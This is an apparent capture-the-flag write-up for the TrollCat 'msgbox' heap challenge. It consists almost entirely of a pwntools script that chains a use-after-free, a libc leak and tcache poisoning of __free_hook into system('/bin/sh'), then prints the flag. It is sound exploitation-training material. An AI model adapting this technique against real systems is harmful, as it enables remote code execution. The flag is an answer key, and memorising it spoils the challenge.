
TrollCat CTF: msgbox [pwn, 499 points]

More secure than “Whatsapp”

I’m starting to get the hang of tcache poisoning, detailed writeup to come later.

from pwn import *

#: CONNECT TO CHALLENGE SERVERS
# Remote endpoint of the challenge service (as given by the CTF).
HOST, PORT = "157.230.33.195", 2222

# The libc shipped with the challenge is loaded first: every symbol offset used
# below is taken from this file, so a different libc build needs its own copy here.
libc = ELF('./libc.so.6', checksec=False)
binary = ELF('./vuln', checksec=False)

# Local run against the same libc (LD_PRELOAD) — kept disabled for debugging.
#p = process('./vuln', env = {'LD_PRELOAD' : libc.path})
p = remote(HOST, PORT)
# Consume the banner up to the first menu prompt so later reads start on a clean slate.
print(p.recvuntil('> '))

#: GDB SETTINGS
# Breakpoints inside the challenge binary; attaching is disabled for the remote run.
breakpoints = ['break *0x400b53', 'break *0x400c9b', 'break *0x400d6e']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: EXPLOIT INTERACTION STUFF
def alloc_chunk(size, index, data):
	"""Drive menu option 1 (allocate) on the remote service.

	Sends the requested size, the slot index and the slot contents, one line
	each, then echoes the reply up to the next menu prompt.  Returns None.
	"""
	for line in ('1', str(size), str(index), data):
		p.sendline(line)
	print(p.recvuntil('> '))

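def show_chunk(index, leak = False):
	"""Drive menu option 2 (show) for slot *index*.

	leak=False: echo the server's reply and return None.
	leak=True:  return the fourth whitespace-separated token of the reply,
	zero-padded to 8 bytes and unpacked as a little-endian u64 — i.e.
	whatever the service prints at that position, read as a pointer —
	instead of printing it.
	"""
	p.sendline('2')
	p.sendline(str(index))
	reply = p.recvuntil('> ')
	if not leak:
		print(reply)
		return None
	# The fill character must be bytes: under Python 3 pwntools the reply is
	# bytes and bytes.ljust() rejects a str fill with TypeError.  On Python 2
	# a b'' literal is an ordinary str, so behaviour there is unchanged.
	token = reply.split()[3]
	return u64(token.ljust(8, b'\x00'))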

def free_chunk(index):
	"""Drive menu option 3 (free) on slot *index* and echo the next prompt.

	Returns None.  Note that the service keeps accepting edit/show on a slot
	after this call — the script below relies on exactly that.
	"""
	for line in ('3', str(index)):
		p.sendline(line)
	print(p.recvuntil('> '))

def edit_chunk(index, data):
	"""Drive menu option 4 (edit): overwrite slot *index* with *data*.

	Sends the option, the slot index and the new contents, then echoes the
	reply up to the next prompt.  Returns None.  The script calls this on
	slots that have just been freed and the service does not reject it —
	that missing check is the use-after-free the rest of the script builds on.
	"""
	messages = ('4', str(index), data)
	for message in messages:
		p.sendline(message)
	print(p.recvuntil('> '))

#: PWN THY VULNS
# Two slots: a large one (0x410 requested) and a small one (0x10).  Each fill is
# one byte short of the request — presumably leaving room for a terminator the
# service appends; confirm against the binary.  The large size is presumably chosen
# so that the freed chunk holds a libc pointer the leak step reads back; why that
# particular size works is allocator-specific and not visible in this script.
alloc_chunk(0x410, 0, 'A' * (0x410-1))
alloc_chunk(0x10, 1, 'B' * (0x10 - 1))

# Root cause exercised here: the service still accepts edit (option 4) and show
# (option 2) on a slot after it was freed (option 3) — a use-after-free.  A 7-byte
# write into the dead slot comes first; its exact purpose is not evident from the
# script (presumably it positions the pointer of interest at the 4th token of the
# show output — TODO confirm).
free_chunk(0)
edit_chunk(0, '1111222')

# Read-back: show_chunk(leak=True) decodes the 4th token of the reply as a pointer.
# 0x3ebca0 is the hard-coded distance from that pointer to the base of the shipped
# libc.so.6; it must be re-derived for any other libc build.
leak = show_chunk(0, leak = True)
libc_base = leak - 0x3ebca0

log.info(hex(leak))
log.info(hex(libc_base))

#: tcache poison
# Same use-after-free on the small slot: free it, then overwrite the freed chunk's
# first bytes with the address of __free_hook (pwntools' symbol offset for the
# shipped libc, rebased on the leak).
free_chunk(1)
edit_chunk(1, p64(libc_base + libc.symbols['__free_hook']))

# Two allocations of the same size as slot 1: the first carries a shell command
# string, the second the rebased address of system().  Where the second one's data
# actually lands depends on the allocator's free-list state set up above; nothing
# after this point is scripted — the session is handed over interactively.
alloc_chunk(0x10, 3, '/bin/sh\x00')
alloc_chunk(0x10, 4, p64(libc_base + libc.symbols['system']))

p.interactive()
#: Trollcat{h34p_h34p_g0_4w4y}